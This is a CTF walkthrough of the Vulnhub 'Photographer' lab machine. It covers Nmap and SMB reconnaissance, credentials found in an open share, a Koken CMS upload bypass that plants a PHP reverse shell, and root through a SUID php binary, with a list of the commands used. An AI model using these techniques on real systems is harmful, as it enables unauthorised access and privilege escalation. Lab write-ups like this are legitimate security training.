Premise
In this post walkthrough, I solved a CTF challenge designed to resemble OSCP Lab machines and The machine name is Photographer from Vulnhub. We started with Nmap scanning to discover open ports and running services and from there we found a vulnerable version of Koken CMS which enabled us to gain remote access. Then we did privilege escalation through looking for SUID bit-binaries
Machine Description
This machine was developed to prepare for OSCP. It is boot2root, tested on VirtualBox (but works on VMWare) and has two flags: user.txt and proof.txt.
Skills Learned
- OSCP
- Privilege Escalation through SUID bit permissions exploitation
- Koken CMS
Getting Started: Reconnaissance
The first step in any penetration test is reconnaissance. I start by identifying the target’s IP address and then launch an aggressive Nmap scan to see what services are running. The scan reveals a few interesting things: an Apache web server on port 80, a Samba server, and another web server on port 8000 running a content management system (CMS) called “Koken.”
I take a quick look at the main webpage on port 80, checking the source code for any clues. I also make a mental note of any interactive elements, like search boxes, that I can come back to later for testing things like cross-site scripting (XSS) or command injection.
Finding a Way In: Exploitation
With a list of running services, I start looking for potential vulnerabilities. I check for exploits for the specific versions of Apache and Samba that are running, but I don’t find anything that I can use in a black-box scenario.
My attention then turns to the Koken CMS. A quick search reveals a promising vulnerability: an arbitrary file upload vulnerability. This means I might be able to upload a malicious file to the server and execute it, giving me a foothold on the system.
But before I can exploit this, I need to get into the Koken admin panel. I use a tool called smbclient
to see if I can access the Samba shares. I find an unauthenticated share and download a couple of files: a WordPress backup and a “mail sent” file. The mail file contains a message with some interesting phrases that I think might be usernames and passwords.
After a few tries, I successfully log into the Koken CMS dashboard with the username “daisa” and the password “baby girl.”
Now it’s time to exploit the file upload vulnerability. I grab a PHP reverse shell script, modify it with my IP address and a port number, and then I get a little creative. To bypass the file upload restrictions, I rename my PHP script to have a .jpg
extension.
I use a tool called Burp Suite to intercept the upload request. As the file is being uploaded, I change the file extension back to .php
in the request. I then start a Netcat listener on my machine, and when I forward the modified request, I get a shell! I now have access to the target machine as the www-data
user.
Moving Up: Privilege Escalation
Now that I’m in, my next goal is to become the root user. I use a Python one-liner to get a more interactive shell and then start gathering information about the system. I find that it’s running an older version of Ubuntu and a specific kernel version.
I try to use a Linux exploit suggester script to find a kernel exploit, but I run into some issues with a missing file. So, I change my strategy. I start looking for files with the SUID bit set. These are special files that run with the permissions of the file owner, not the user who is running them.
I find that the php7.2
binary has the SUID bit set. This is a huge find! I can now use the PHP binary to execute commands as the root user. I run a simple PHP command to spawn a bash shell, and just like that, I have a root shell! I confirm my new privileges with the id
command, and the CTF is complete. 🏆
Technical Commands Used
Throughout this CTF, I used a variety of commands to achieve my goals. Here are some of the key commands I used:
- Nmap Scan:
nmap -sV -sC -p- 194.94.128
- Searchsploit:
sudo searchsploit apache 2.4.18
sudo searchsploit samba 4.3.11
sudo searchsploit koken 0.22.24
- SMB Client:
smbclient -L 194.94.128
smbclient //194.94.128/samba
- File Transfer (within SMB Client):
get mail.sent
get wordpress.backup
- File Manipulation:
nano php-reverse-shell.php
mv php-reverse-shell.php php-reverse-shell.php.jpg
- Netcat Listener:
nc -nvlp 3434
- Python PTY Shell:
python -c 'import pty; pty.spawn("/bin/bash")'
- System Information Gathering:
cat /etc/os-release
cat /proc/version
- Downloading and Running Scripts:
wget https://raw.githubusercontent.com/The-Z-Labs/linux-exploit-suggester/master/linux-exploit-suggester.sh
chmod +x linux-exploit-suggester.sh
./linux-exploit-suggester.sh
- Finding SUID Binaries:
find / -perm -u=s -type f 2>/dev/null
- Privilege Escalation:
/usr/bin/php7.2 -r 'system("id");'
Video Walk-through